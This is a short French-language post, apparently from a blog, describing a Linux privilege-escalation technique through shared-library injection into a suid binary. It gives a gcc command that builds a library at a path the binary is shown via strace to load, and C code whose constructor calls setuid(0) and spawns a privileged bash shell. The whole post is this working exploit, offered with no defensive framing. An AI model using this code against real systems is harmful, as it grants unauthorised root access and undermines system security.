Injection de code lors de l’exécution d’un binaire suid

suid injection

#include <stdio.h>
#include <stdlib.h>

toinject.c
gcc -shared -fPIC -o /home/user/.config/libcalc.so toinject.c #par exemple, en utilisant strace, on se rend compte que le binaire essaie de charger /home/user/.config/libcalc.so

toinject.c
static void inject() __attribute__((constructor));

void inject() {
              setuid(0);
              system("/bin/bash -p");
}

Leave a Reply